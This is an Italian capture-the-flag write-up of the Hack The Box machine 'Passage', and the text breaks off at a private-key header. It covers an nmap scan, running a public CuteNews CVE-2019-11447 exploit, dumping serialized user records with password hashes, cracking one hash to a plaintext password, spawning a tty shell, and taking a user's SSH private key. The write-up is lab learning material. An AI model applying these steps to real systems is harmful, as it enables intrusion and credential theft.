La scansione con nmap riporta solamente due porte aperte, la 22 e la 80. Questa situazione facilita le cose perché limita molto il raggio d’azione, decido di lavorare sulla porta 80.

# Nmap 7.80 scan initiated Sat Sep 12 22:17:26 2020 as: nmap -T5 --open -sS -vvv --min-rate=1000 --max-retries=2 -p- -oA full-ports 10.10.10.206
Nmap scan report for 10.10.10.206
Host is up, received echo-reply ttl 63 (0.055s latency).
Scanned at 2020-09-12 22:17:26 CEST for 43s
Not shown: 65533 closed ports
Reason: 65533 resets
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63

Read data files from: /usr/local/bin/../share/nmap
# Nmap done at Sat Sep 12 22:18:09 2020 -- 1 IP address (1 host up) scanned in 43.19 seconds

Visualizzando la home page mi trovo di fronte al gestore di news CuteNews.

Una news riporta che è stato implementato Fail2Ban per evitare il bruteforce di directories e files quindi evito di. lanciare dirb.

Faccio una ricerca su google in merito a CuteNews e mi imbatto in un exploit di metasploit dove visualizzando il sorgente vedo che utilizza l’url http://IP/CuteNews. Visitando l’indirizzo mi ritrovo di fronte a un form di login / registrazione e dal momento che l’exploit richiede l’autenticaizione, mi registro.

Se posso cerco di evitare l’utilizzo di metasploit, soprattutto quando faccio esercizio con HTB. Continuo la mia ricerca su Google finché non trovo un exploit su GitHub, caricato di recente, penso proprio che sia stato sviluppato per essere utilizzato su HTB. L’exploit è il seguente:

https://github.com/CRFSlick/CVE-2019-11447-POC

Lo lancio e sebbene non sia a conoscenza della versione di CuteNews, sembra funzionare:

python3 CVE-2019-11447.py test test http://10.10.10.206/CuteNews/index.php

A questo punto per avere una shell più comoda prendo la reverse con netcat.

La prima cosa che faccio è controllare i file di CuteNews per vedere se c’è qualche file di configurazione con delle credenziali. Dopo un po’ di ricerche mi imbatto in una cartella /var/www/html/CuteNews/cdata/users contente dei file php. All’interno dei file c’è una stringa base64 che decodificata rappresenta un oggetto php serializzato con le info degli utenti registrati.

Nota: Questo screen è stato catturato dopo aver completato la macchina.

Dumpo il contenuto di tutti i file in un unico file per comodità:

find . -name '*.php' -exec cat {} \; > all.txt

YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTU6InNpZEBleGFtcGxlLmNvbSI7czo5OiJzaWQtbWVpZXIiO319
YToxOntzOjI6ImlkIjthOjE6e2k6MTYwMDQzNzM5NDtzOjEwOiJMV3RXR1dNYzNrIjt9fQ==
YToxOntzOjQ6Im5hbWUiO2E6MTp7czoxMDoib2Q4cGJxUGxEViI7YTo5OntzOjI6ImlkIjtzOjEwOiIxNjAwNDM3MTE3IjtzOjQ6Im5hbWUiO3M6MTA6Im9kOHBicVBsRFYiO3M6MzoiYWNsIjtzOjE6IjQiO3M6NToiZW1haWwiO3M6MTg6Im9kOHBicVBsRFZAaGFjay5tZSI7czo0OiJuaWNrIjtzOjEwOiJvZDhwYnFQbERWIjtzOjQ6InBhc3MiO3M6NjQ6IjAwNDZkYWViZGQ2ZTIzOGIxYThlMWVmYzQxZDEyOGMzNzI5NGIxZTlhZjRjM2JkMjZkZDIzZmRiNzY1YjE4MDUiO3M6NDoibW9yZSI7czo2MDoiWVRveU9udHpPalE2SW5OcGRHVWlPM002TURvaUlqdHpPalU2SW1GaWIzVjBJanR6T2pBNklpSTdmUT09IjtzOjY6ImF2YXRhciI7czozMjoiYXZhdGFyX29kOHBicVBsRFZfb2Q4cGJxUGxEVi5waHAiO3M6NjoiZS1oaWRlIjtzOjA6IiI7fX19
YToxOntzOjQ6Im5hbWUiO2E6MTp7czoxMDoiUWZOQWZGeWh0TCI7YTo5OntzOjI6ImlkIjtzOjEwOiIxNjAwNDM3Njc3IjtzOjQ6Im5hbWUiO3M6MTA6IlFmTkFmRnlodEwiO3M6MzoiYWNsIjtzOjE6IjQiO3M6NToiZW1haWwiO3M6MTg6IlFmTkFmRnlodExAaGFjay5tZSI7czo0OiJuaWNrIjtzOjEwOiJRZk5BZkZ5aHRMIjtzOjQ6InBhc3MiO3M6NjQ6ImQwNTUwMDBkYWU0MDdjMGI1YjI3NTY3ODk4Yjc4MWNjNzk3NzMxOTM4OTcyYjI3ZTdmYzFmZDI4YmU0MTMyY2UiO3M6NDoibW9yZSI7czo2MDoiWVRveU9udHpPalE2SW5OcGRHVWlPM002TURvaUlqdHpPalU2SW1GaWIzVjBJanR6T2pBNklpSTdmUT09IjtzOjY6ImF2YXRhciI7czozMjoiYXZhdGFyX1FmTkFmRnlodExfUWZOQWZGeWh0TC5waHAiO3M6NjoiZS1oaWRlIjtzOjA6IiI7fX19
YToxOntzOjQ6Im5hbWUiO2E6MTp7czo5OiJraW0tc3dpZnQiO2E6OTp7czoyOiJpZCI7czoxMDoiMTU5MjQ4MzMwOSI7czo0OiJuYW1lIjtzOjk6ImtpbS1zd2lmdCI7czozOiJhY2wiO3M6MToiMyI7czo1OiJlbWFpbCI7czoxNToia2ltQGV4YW1wbGUuY29tIjtzOjQ6Im5pY2siO3M6OToiS2ltIFN3aWZ0IjtzOjQ6InBhc3MiO3M6NjQ6ImY2NjlhNmY2OTFmOThhYjA1NjIzNTZjMGNkNWQ1ZTdkY2RjMjBhMDc5NDFjODZhZGNmY2U5YWYzMDg1ZmJlY2EiO3M6MzoibHRzIjtzOjEwOiIxNTkyNDg3MDk2IjtzOjM6ImJhbiI7czoxOiIwIjtzOjM6ImNudCI7czoxOiIzIjt9fX0=
YToyOntzOjI6ImlkIjthOjE6e2k6MTU5ODkxMDg5NjtzOjY6ImhhY2tlciI7fXM6NDoibmFtZSI7YToxOntzOjEwOiI2cllnZEplUGJ6IjthOjk6e3M6MjoiaWQiO3M6MTA6IjE2MDA0MzY5NTMiO3M6NDoibmFtZSI7czoxMDoiNnJZZ2RKZVBieiI7czozOiJhY2wiO3M6MToiNCI7czo1OiJlbWFpbCI7czoxODoiNnJZZ2RKZVBiekBoYWNrLm1lIjtzOjQ6Im5pY2siO3M6MTA6IjZyWWdkSmVQYnoiO3M6NDoicGFzcyI7czo2NDoiNzEwNjljZDQ1ZWIxMmU1NjE4ZDE5NmI1Mzk5YWE1OTU0ZDcyNWQ5MzhjMWIwOWFmZTE0N2MzYjA3NDQ0ODg5MSI7czo0OiJtb3JlIjtzOjYwOiJZVG95T250ek9qUTZJbk5wZEdVaU8zTTZNRG9pSWp0ek9qVTZJbUZpYjNWMElqdHpPakE2SWlJN2ZRPT0iO3M6NjoiYXZhdGFyIjtzOjMyOiJhdmF0YXJfNnJZZ2RKZVBiel82cllnZEplUGJ6LnBocCI7czo2OiJlLWhpZGUiO3M6MDoiIjt9fX0=
YToxOntzOjI6ImlkIjthOjE6e2k6MTU5ODgyOTgzMztzOjY6ImVncmU1NSI7fX0=
YToxOntzOjQ6Im5hbWUiO2E6MTp7czo1OiJraWthcyI7YToxMTp7czozOiJiYW4iO3M6MToiMCI7czoyOiJpZCI7czoxMDoiMTYwMDQzNzI5NiI7czo0OiJuYW1lIjtzOjU6Imtpa2FzIjtzOjM6ImFjbCI7czoxOiI0IjtzOjU6ImVtYWlsIjtzOjk6Imtpa2FzQGh0YiI7czo0OiJuaWNrIjtzOjU6Imtpa2FzIjtzOjQ6InBhc3MiO3M6NjQ6IjQyYTBlNWEwYTU0MDRlNWY2OTVmYWY4ZTU5ZDY3ZGZjYjNjMTFiYTA5ZmMwNzg4ZDY0ZmE0ZGY2YzgwMDJlZWIiO3M6MzoibHRzIjtzOjEwOiIxNjAwNDM3NDU3IjtzOjQ6Im1vcmUiO3M6NjA6IllUb3lPbnR6T2pRNkluTnBkR1VpTzNNNk1Eb2lJanR6T2pVNkltRmliM1YwSWp0ek9qQTZJaUk3ZlE9PSI7czo2OiJhdmF0YXIiO3M6MjU6ImF2YXRhcl9raWthc19ob3RxYWZnZi5waHAiO3M6NjoiZS1oaWRlIjtzOjA6IiI7fX19
YToxOntzOjQ6Im5hbWUiO2E6MTp7czo5OiJzaWQtbWVpZXIiO2E6OTp7czoyOiJpZCI7czoxMDoiMTU5MjQ4MzI4MSI7czo0OiJuYW1lIjtzOjk6InNpZC1tZWllciI7czozOiJhY2wiO3M6MToiMyI7czo1OiJlbWFpbCI7czoxNToic2lkQGV4YW1wbGUuY29tIjtzOjQ6Im5pY2siO3M6OToiU2lkIE1laWVyIjtzOjQ6InBhc3MiO3M6NjQ6IjRiZGQwYTBiYjQ3ZmM5ZjY2Y2JmMWE4OTgyZmQyZDM0NGQyYWVjMjgzZDFhZmFlYmI0NjUzZWMzOTU0ZGZmODgiO3M6MzoibHRzIjtzOjEwOiIxNTkyNDg1NjQ1IjtzOjM6ImJhbiI7czoxOiIwIjtzOjM6ImNudCI7czoxOiIyIjt9fX0=
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTU6ImtpbUBleGFtcGxlLmNvbSI7czo5OiJraW0tc3dpZnQiO319
YToxOntzOjI6ImlkIjthOjE6e2k6MTU5MjQ4MzA0NztzOjU6ImFkbWluIjt9fQ==
YToxOntzOjI6ImlkIjthOjE6e2k6MTYwMDQzNzExNztzOjEwOiJvZDhwYnFQbERWIjt9fQ==
YToxOntzOjI6ImlkIjthOjE6e2k6MTYwMDQzNzY3NztzOjEwOiJRZk5BZkZ5aHRMIjt9fQ==
YToxOntzOjI6ImlkIjthOjE6e2k6MTU5MjQ4MzMwOTtzOjk6ImtpbS1zd2lmdCI7fX0=
YToxOntzOjQ6Im5hbWUiO2E6MTp7czo1OiJhZG1pbiI7YTo4OntzOjI6ImlkIjtzOjEwOiIxNTkyNDgzMDQ3IjtzOjQ6Im5hbWUiO3M6NToiYWRtaW4iO3M6MzoiYWNsIjtzOjE6IjEiO3M6NToiZW1haWwiO3M6MTc6Im5hZGF2QHBhc3NhZ2UuaHRiIjtzOjQ6InBhc3MiO3M6NjQ6IjcxNDRhOGI1MzFjMjdhNjBiNTFkODFhZTE2YmUzYTgxY2VmNzIyZTExYjQzYTI2ZmRlMGNhOTdmOWUxNDg1ZTEiO3M6MzoibHRzIjtzOjEwOiIxNTkyNDg3OTg4IjtzOjM6ImJhbiI7czoxOiIwIjtzOjM6ImNudCI7czoxOiIyIjt9fX0=
YToxOntzOjQ6Im5hbWUiO2E6MTp7czoxMDoicGF1bC1jb2xlcyI7YTo5OntzOjI6ImlkIjtzOjEwOiIxNTkyNDgzMjM2IjtzOjQ6Im5hbWUiO3M6MTA6InBhdWwtY29sZXMiO3M6MzoiYWNsIjtzOjE6IjIiO3M6NToiZW1haWwiO3M6MTY6InBhdWxAcGFzc2FnZS5odGIiO3M6NDoibmljayI7czoxMDoiUGF1bCBDb2xlcyI7czo0OiJwYXNzIjtzOjY0OiJlMjZmM2U4NmQxZjgxMDgxMjA3MjNlYmU2OTBlNWQzZDYxNjI4ZjQxMzAwNzZlYzZjYjQzZjE2ZjQ5NzI3M2NkIjtzOjM6Imx0cyI7czoxMDoiMTU5MjQ4NTU1NiI7czozOiJiYW4iO3M6MToiMCI7czozOiJjbnQiO3M6MToiMiI7fX19
YToyOntzOjU6ImVtYWlsIjthOjE6e3M6MTY6InBhdWxAcGFzc2FnZS5odGIiO3M6MTA6InBhdWwtY29sZXMiO31zOjQ6Im5hbWUiO2E6Mjp7czo0OiJ0ZXN0IjthOjExOntzOjM6ImJhbiI7czoxOiIwIjtzOjI6ImlkIjtzOjEwOiIxNjAwNDM3NDY3IjtzOjQ6Im5hbWUiO3M6NDoidGVzdCI7czozOiJhY2wiO3M6MToiNCI7czo1OiJlbWFpbCI7czoxMzoidGVzdEB0b2FzdC50byI7czo0OiJuaWNrIjtzOjA6IiI7czo0OiJwYXNzIjtzOjY0OiI5Zjg2ZDA4MTg4NGM3ZDY1OWEyZmVhYTBjNTVhZDAxNWEzYmY0ZjFiMmIwYjgyMmNkMTVkNmMxNWIwZjAwYTA4IjtzOjM6Imx0cyI7czoxMDoiMTYwMDQzNzU0OSI7czo0OiJtb3JlIjtzOjQ6IlRqcz0iO3M6NjoiYXZhdGFyIjtzOjIxOiJhdmF0YXJfdGVzdF83NTMwNy5waHAiO3M6NjoiZS1oaWRlIjtzOjA6IiI7fXM6MTY6InBhdWxAcGFzc2FnZS5odGIiO2E6MTp7czozOiJiYW4iO3M6MTA6IjE2MDA0Mzk1MTMiO319fQ==
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTg6Im9kOHBicVBsRFZAaGFjay5tZSI7czoxMDoib2Q4cGJxUGxEViI7fX0=
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTU6ImVncmU1NUB0ZXN0LmNvbSI7czo2OiJlZ3JlNTUiO319
YToxOntzOjQ6Im5hbWUiO2E6Mjp7czo2OiJlZ3JlNTUiO2E6MTE6e3M6MjoiaWQiO3M6MTA6IjE1OTg4Mjk4MzMiO3M6NDoibmFtZSI7czo2OiJlZ3JlNTUiO3M6MzoiYWNsIjtzOjE6IjQiO3M6NToiZW1haWwiO3M6MTU6ImVncmU1NUB0ZXN0LmNvbSI7czo0OiJuaWNrIjtzOjY6ImVncmU1NSI7czo0OiJwYXNzIjtzOjY0OiI0ZGIxZjBiZmQ2M2JlMDU4ZDRhYjA0ZjE4ZjY1MzMxYWMxMWJiNDk0YjU3OTJjNDgwZmFmN2ZiMGM0MGZhOWNjIjtzOjQ6Im1vcmUiO3M6NjA6IllUb3lPbnR6T2pRNkluTnBkR1VpTzNNNk1Eb2lJanR6T2pVNkltRmliM1YwSWp0ek9qQTZJaUk3ZlE9PSI7czozOiJsdHMiO3M6MTA6IjE1OTg5MDY4ODEiO3M6MzoiYmFuIjtzOjE6IjAiO3M6NjoiYXZhdGFyIjtzOjI2OiJhdmF0YXJfZWdyZTU1X3lreG5hY3B0LnBocCI7czo2OiJlLWhpZGUiO3M6MDoiIjt9czo2OiJoYWNrZXIiO2E6MTE6e3M6MjoiaWQiO3M6MTA6IjE1OTg5MTA4OTYiO3M6NDoibmFtZSI7czo2OiJoYWNrZXIiO3M6MzoiYWNsIjtzOjE6IjQiO3M6NToiZW1haWwiO3M6MjA6ImhhY2tlckBoYWNrZXIuaGFja2VyIjtzOjQ6Im5pY2siO3M6NjoiaGFja2VyIjtzOjQ6InBhc3MiO3M6NjQ6ImU3ZDM2ODU3MTU5Mzk4NDI3NDljYzI3YjM4ZDBjY2I5NzA2ZDRkMTRhNTMwNGVmOWVlZTA5Mzc4MGVhYjVkZjkiO3M6MzoibHRzIjtzOjEwOiIxNTk4OTEwOTExIjtzOjM6ImJhbiI7czoxOiIwIjtzOjQ6Im1vcmUiO3M6NjA6IllUb3lPbnR6T2pRNkluTnBkR1VpTzNNNk1Eb2lJanR6T2pVNkltRmliM1YwSWp0ek9qQTZJaUk3ZlE9PSI7czo2OiJhdmF0YXIiO3M6MjY6ImF2YXRhcl9oYWNrZXJfanB5b3lza3QucGhwIjtzOjY6ImUtaGlkZSI7czowOiIiO319fQ==
YToxOntzOjQ6Im5hbWUiO2E6MTp7czo0OiJwYXVsIjthOjE6e3M6MzoiYmFuIjtzOjEwOiIxNjAwNDM5NTAzIjt9fX0=
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTg6IlFmTkFmRnlodExAaGFjay5tZSI7czoxMDoiUWZOQWZGeWh0TCI7fX0=
YToxOntzOjQ6Im5hbWUiO2E6MTp7czoxMDoiTFd0V0dXTWMzayI7YTo5OntzOjI6ImlkIjtzOjEwOiIxNjAwNDM3Mzk0IjtzOjQ6Im5hbWUiO3M6MTA6IkxXdFdHV01jM2siO3M6MzoiYWNsIjtzOjE6IjQiO3M6NToiZW1haWwiO3M6MTg6IkxXdFdHV01jM2tAaGFjay5tZSI7czo0OiJuaWNrIjtzOjEwOiJMV3RXR1dNYzNrIjtzOjQ6InBhc3MiO3M6NjQ6IjVkOTEyNGU5NGFmNWRiNzIwZTYwNzI3NzAyYjE3MTY5NzJjZDYxNDg0MGQ5ZjhjNzAyZjczMDVkNGU2YTgwNTgiO3M6NDoibW9yZSI7czo2MDoiWVRveU9udHpPalE2SW5OcGRHVWlPM002TURvaUlqdHpPalU2SW1GaWIzVjBJanR6T2pBNklpSTdmUT09IjtzOjY6ImF2YXRhciI7czozMjoiYXZhdGFyX0xXdFdHV01jM2tfTFd0V0dXTWMzay5waHAiO3M6NjoiZS1oaWRlIjtzOjA6IiI7fX19
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTg6IjZyWWdkSmVQYnpAaGFjay5tZSI7czoxMDoiNnJZZ2RKZVBieiI7fX0=
YToyOntzOjQ6Im5hbWUiO2E6MTp7czoxMDoieFhuRjJJMWxYaCI7YTo5OntzOjI6ImlkIjtzOjEwOiIxNjAwNDM3MTUzIjtzOjQ6Im5hbWUiO3M6MTA6InhYbkYySTFsWGgiO3M6MzoiYWNsIjtzOjE6IjQiO3M6NToiZW1haWwiO3M6MTg6InhYbkYySTFsWGhAaGFjay5tZSI7czo0OiJuaWNrIjtzOjEwOiJ4WG5GMkkxbFhoIjtzOjQ6InBhc3MiO3M6NjQ6ImIyNDRlZGRiMTE2OGU4Mjg5NTVlZDYwMDAwNTVjY2U0OTc3ZTEzNGI2YTViYjhhNDdiNWEzMmJjYzliOTY3YjkiO3M6NDoibW9yZSI7czo2MDoiWVRveU9udHpPalE2SW5OcGRHVWlPM002TURvaUlqdHpPalU2SW1GaWIzVjBJanR6T2pBNklpSTdmUT09IjtzOjY6ImF2YXRhciI7czozMjoiYXZhdGFyX3hYbkYySTFsWGhfeFhuRjJJMWxYaC5waHAiO3M6NjoiZS1oaWRlIjtzOjA6IiI7fX1zOjU6ImVtYWlsIjthOjE6e3M6MTg6InhYbkYySTFsWGhAaGFjay5tZSI7czoxMDoieFhuRjJJMWxYaCI7fX0=
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTM6InRlc3RAdG9hc3QudG8iO3M6NDoidGVzdCI7fX0=
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTc6Im5hZGF2QHBhc3NhZ2UuaHRiIjtzOjU6ImFkbWluIjt9fQ==
YToxOntzOjI6ImlkIjthOjE6e2k6MTYwMDQzNzE1MztzOjEwOiJ4WG5GMkkxbFhoIjt9fQ==
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6OToia2lrYXNAaHRiIjtzOjU6Imtpa2FzIjt9fQ==
YToxOntzOjI6ImlkIjthOjE6e2k6MTYwMDQzNjk1MztzOjEwOiI2cllnZEplUGJ6Ijt9fQ==
YToxOntzOjU6ImVtYWlsIjthOjI6e3M6MjA6ImhhY2tlckBoYWNrZXIuaGFja2VyIjtzOjY6ImhhY2tlciI7czoxODoiTFd0V0dXTWMza0BoYWNrLm1lIjtzOjEwOiJMV3RXR1dNYzNrIjt9fQ==
YToxOntzOjI6ImlkIjthOjE6e2k6MTYwMDQzNzI5NjtzOjU6Imtpa2FzIjt9fQ==
YToxOntzOjI6ImlkIjthOjI6e2k6MTU5MjQ4MzI4MTtzOjk6InNpZC1tZWllciI7aToxNjAwNDM3NDY3O3M6NDoidGVzdCI7fX0=
YToxOntzOjI6ImlkIjthOjE6e2k6MTU5MjQ4MzIzNjtzOjEwOiJwYXVsLWNvbGVzIjt9fQ==

Decodifico le stringhe e ottengo gli utenti:

a:1:{s:5:"email";a:1:{s:15:"sid@example.com";s:9:"sid-meier";}}
a:1:{s:2:"id";a:1:{i:1600437394;s:10:"LWtWGWMc3k";}}
a:1:{s:4:"name";a:1:{s:10:"od8pbqPlDV";a:9:{s:2:"id";s:10:"1600437117";s:4:"name";s:10:"od8pbqPlDV";s:3:"acl";s:1:"4";s:5:"email";s:18:"od8pbqPlDV@hack.me";s:4:"nick";s:10:"od8pbqPlDV";s:4:"pass";s:64:"0046daebdd6e238b1a8e1efc41d128c37294b1e9af4c3bd26dd23fdb765b1805";s:4:"more";s:60:"YToyOntzOjQ6InNpdGUiO3M6MDoiIjtzOjU6ImFib3V0IjtzOjA6IiI7fQ==";s:6:"avatar";s:32:"avatar_od8pbqPlDV_od8pbqPlDV.php";s:6:"e-hide";s:0:"";}}}
a:1:{s:4:"name";a:1:{s:10:"QfNAfFyhtL";a:9:{s:2:"id";s:10:"1600437677";s:4:"name";s:10:"QfNAfFyhtL";s:3:"acl";s:1:"4";s:5:"email";s:18:"QfNAfFyhtL@hack.me";s:4:"nick";s:10:"QfNAfFyhtL";s:4:"pass";s:64:"d055000dae407c0b5b27567898b781cc797731938972b27e7fc1fd28be4132ce";s:4:"more";s:60:"YToyOntzOjQ6InNpdGUiO3M6MDoiIjtzOjU6ImFib3V0IjtzOjA6IiI7fQ==";s:6:"avatar";s:32:"avatar_QfNAfFyhtL_QfNAfFyhtL.php";s:6:"e-hide";s:0:"";}}}
a:1:{s:4:"name";a:1:{s:9:"kim-swift";a:9:{s:2:"id";s:10:"1592483309";s:4:"name";s:9:"kim-swift";s:3:"acl";s:1:"3";s:5:"email";s:15:"kim@example.com";s:4:"nick";s:9:"Kim Swift";s:4:"pass";s:64:"f669a6f691f98ab0562356c0cd5d5e7dcdc20a07941c86adcfce9af3085fbeca";s:3:"lts";s:10:"1592487096";s:3:"ban";s:1:"0";s:3:"cnt";s:1:"3";}}}
a:2:{s:2:"id";a:1:{i:1598910896;s:6:"hacker";}s:4:"name";a:1:{s:10:"6rYgdJePbz";a:9:{s:2:"id";s:10:"1600436953";s:4:"name";s:10:"6rYgdJePbz";s:3:"acl";s:1:"4";s:5:"email";s:18:"6rYgdJePbz@hack.me";s:4:"nick";s:10:"6rYgdJePbz";s:4:"pass";s:64:"71069cd45eb12e5618d196b5399aa5954d725d938c1b09afe147c3b074448891";s:4:"more";s:60:"YToyOntzOjQ6InNpdGUiO3M6MDoiIjtzOjU6ImFib3V0IjtzOjA6IiI7fQ==";s:6:"avatar";s:32:"avatar_6rYgdJePbz_6rYgdJePbz.php";s:6:"e-hide";s:0:"";}}}
a:1:{s:2:"id";a:1:{i:1598829833;s:6:"egre55";}}
a:1:{s:4:"name";a:1:{s:5:"kikas";a:11:{s:3:"ban";s:1:"0";s:2:"id";s:10:"1600437296";s:4:"name";s:5:"kikas";s:3:"acl";s:1:"4";s:5:"email";s:9:"kikas@htb";s:4:"nick";s:5:"kikas";s:4:"pass";s:64:"42a0e5a0a5404e5f695faf8e59d67dfcb3c11ba09fc0788d64fa4df6c8002eeb";s:3:"lts";s:10:"1600437457";s:4:"more";s:60:"YToyOntzOjQ6InNpdGUiO3M6MDoiIjtzOjU6ImFib3V0IjtzOjA6IiI7fQ==";s:6:"avatar";s:25:"avatar_kikas_hotqafgf.php";s:6:"e-hide";s:0:"";}}}
a:1:{s:4:"name";a:1:{s:9:"sid-meier";a:9:{s:2:"id";s:10:"1592483281";s:4:"name";s:9:"sid-meier";s:3:"acl";s:1:"3";s:5:"email";s:15:"sid@example.com";s:4:"nick";s:9:"Sid Meier";s:4:"pass";s:64:"4bdd0a0bb47fc9f66cbf1a8982fd2d344d2aec283d1afaebb4653ec3954dff88";s:3:"lts";s:10:"1592485645";s:3:"ban";s:1:"0";s:3:"cnt";s:1:"2";}}}
a:1:{s:5:"email";a:1:{s:15:"kim@example.com";s:9:"kim-swift";}}
a:1:{s:2:"id";a:1:{i:1592483047;s:5:"admin";}}
a:1:{s:2:"id";a:1:{i:1600437117;s:10:"od8pbqPlDV";}}
a:1:{s:2:"id";a:1:{i:1600437677;s:10:"QfNAfFyhtL";}}
a:1:{s:2:"id";a:1:{i:1592483309;s:9:"kim-swift";}}
a:1:{s:4:"name";a:1:{s:5:"admin";a:8:{s:2:"id";s:10:"1592483047";s:4:"name";s:5:"admin";s:3:"acl";s:1:"1";s:5:"email";s:17:"nadav@passage.htb";s:4:"pass";s:64:"7144a8b531c27a60b51d81ae16be3a81cef722e11b43a26fde0ca97f9e1485e1";s:3:"lts";s:10:"1592487988";s:3:"ban";s:1:"0";s:3:"cnt";s:1:"2";}}}
a:1:{s:4:"name";a:1:{s:10:"paul-coles";a:9:{s:2:"id";s:10:"1592483236";s:4:"name";s:10:"paul-coles";s:3:"acl";s:1:"2";s:5:"email";s:16:"paul@passage.htb";s:4:"nick";s:10:"Paul Coles";s:4:"pass";s:64:"e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd";s:3:"lts";s:10:"1592485556";s:3:"ban";s:1:"0";s:3:"cnt";s:1:"2";}}}
a:2:{s:5:"email";a:1:{s:16:"paul@passage.htb";s:10:"paul-coles";}s:4:"name";a:2:{s:4:"test";a:11:{s:3:"ban";s:1:"0";s:2:"id";s:10:"1600437467";s:4:"name";s:4:"test";s:3:"acl";s:1:"4";s:5:"email";s:13:"test@toast.to";s:4:"nick";s:0:"";s:4:"pass";s:64:"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08";s:3:"lts";s:10:"1600437549";s:4:"more";s:4:"Tjs=";s:6:"avatar";s:21:"avatar_test_75307.php";s:6:"e-hide";s:0:"";}s:16:"paul@passage.htb";a:1:{s:3:"ban";s:10:"1600439513";}}}
a:1:{s:5:"email";a:1:{s:18:"od8pbqPlDV@hack.me";s:10:"od8pbqPlDV";}}
a:1:{s:5:"email";a:1:{s:15:"egre55@test.com";s:6:"egre55";}}
a:1:{s:4:"name";a:2:{s:6:"egre55";a:11:{s:2:"id";s:10:"1598829833";s:4:"name";s:6:"egre55";s:3:"acl";s:1:"4";s:5:"email";s:15:"egre55@test.com";s:4:"nick";s:6:"egre55";s:4:"pass";s:64:"4db1f0bfd63be058d4ab04f18f65331ac11bb494b5792c480faf7fb0c40fa9cc";s:4:"more";s:60:"YToyOntzOjQ6InNpdGUiO3M6MDoiIjtzOjU6ImFib3V0IjtzOjA6IiI7fQ==";s:3:"lts";s:10:"1598906881";s:3:"ban";s:1:"0";s:6:"avatar";s:26:"avatar_egre55_ykxnacpt.php";s:6:"e-hide";s:0:"";}s:6:"hacker";a:11:{s:2:"id";s:10:"1598910896";s:4:"name";s:6:"hacker";s:3:"acl";s:1:"4";s:5:"email";s:20:"hacker@hacker.hacker";s:4:"nick";s:6:"hacker";s:4:"pass";s:64:"e7d3685715939842749cc27b38d0ccb9706d4d14a5304ef9eee093780eab5df9";s:3:"lts";s:10:"1598910911";s:3:"ban";s:1:"0";s:4:"more";s:60:"YToyOntzOjQ6InNpdGUiO3M6MDoiIjtzOjU6ImFib3V0IjtzOjA6IiI7fQ==";s:6:"avatar";s:26:"avatar_hacker_jpyoyskt.php";s:6:"e-hide";s:0:"";}}}
a:1:{s:4:"name";a:1:{s:4:"paul";a:1:{s:3:"ban";s:10:"1600439503";}}}
a:1:{s:5:"email";a:1:{s:18:"QfNAfFyhtL@hack.me";s:10:"QfNAfFyhtL";}}
a:1:{s:4:"name";a:1:{s:10:"LWtWGWMc3k";a:9:{s:2:"id";s:10:"1600437394";s:4:"name";s:10:"LWtWGWMc3k";s:3:"acl";s:1:"4";s:5:"email";s:18:"LWtWGWMc3k@hack.me";s:4:"nick";s:10:"LWtWGWMc3k";s:4:"pass";s:64:"5d9124e94af5db720e60727702b1716972cd614840d9f8c702f7305d4e6a8058";s:4:"more";s:60:"YToyOntzOjQ6InNpdGUiO3M6MDoiIjtzOjU6ImFib3V0IjtzOjA6IiI7fQ==";s:6:"avatar";s:32:"avatar_LWtWGWMc3k_LWtWGWMc3k.php";s:6:"e-hide";s:0:"";}}}
a:1:{s:5:"email";a:1:{s:18:"6rYgdJePbz@hack.me";s:10:"6rYgdJePbz";}}
a:2:{s:4:"name";a:1:{s:10:"xXnF2I1lXh";a:9:{s:2:"id";s:10:"1600437153";s:4:"name";s:10:"xXnF2I1lXh";s:3:"acl";s:1:"4";s:5:"email";s:18:"xXnF2I1lXh@hack.me";s:4:"nick";s:10:"xXnF2I1lXh";s:4:"pass";s:64:"b244eddb1168e828955ed6000055cce4977e134b6a5bb8a47b5a32bcc9b967b9";s:4:"more";s:60:"YToyOntzOjQ6InNpdGUiO3M6MDoiIjtzOjU6ImFib3V0IjtzOjA6IiI7fQ==";s:6:"avatar";s:32:"avatar_xXnF2I1lXh_xXnF2I1lXh.php";s:6:"e-hide";s:0:"";}}s:5:"email";a:1:{s:18:"xXnF2I1lXh@hack.me";s:10:"xXnF2I1lXh";}}
a:1:{s:5:"email";a:1:{s:13:"test@toast.to";s:4:"test";}}
a:1:{s:5:"email";a:1:{s:17:"nadav@passage.htb";s:5:"admin";}}
a:1:{s:2:"id";a:1:{i:1600437153;s:10:"xXnF2I1lXh";}}
a:1:{s:5:"email";a:1:{s:9:"kikas@htb";s:5:"kikas";}}
a:1:{s:2:"id";a:1:{i:1600436953;s:10:"6rYgdJePbz";}}
a:1:{s:5:"email";a:2:{s:20:"hacker@hacker.hacker";s:6:"hacker";s:18:"LWtWGWMc3k@hack.me";s:10:"LWtWGWMc3k";}}
a:1:{s:2:"id";a:1:{i:1600437296;s:5:"kikas";}}
a:1:{s:2:"id";a:2:{i:1592483281;s:9:"sid-meier";i:1600437467;s:4:"test";}}
a:1:{s:2:"id";a:1:{i:1592483236;s:10:"paul-coles";}}

Esistono vari oggetti serializzati che rappresentano gli utenti registrati al sito. In alcuni oggetti è visibile la password cifrata.

Facendo un giro all’interno della macchina vedo che esistono due utenze: paul e nadav.

Tra gli utenti che ho trovato nel file precedente esiste un utente di nome paul, prendo l’hash della sua password e lo incollo qua:

https://www.tunnelsup.com/hash-analyzer/

Il sito mi rivela che si tratta di un hash SHA-256.

Provo a decifrare l’hash con hashcat e ottengo la password: atlanta1

Cerco di collegarmi con ssh ma non funziona poiché la mia macchina non risulta tra quelle autorizzate (public key).

Spawno una shell tty con python python -c 'import pty; pty.spawn("/bin/bash")' e provo il comando su paul:

A questo punto spulcio la cartella /home/paul e trovo dentro a .ssh la chiave id_rsa privata di paul, con questa posso collegarmi tramite ssh:

-----BEGIN RSA PRIVATE KEY-----
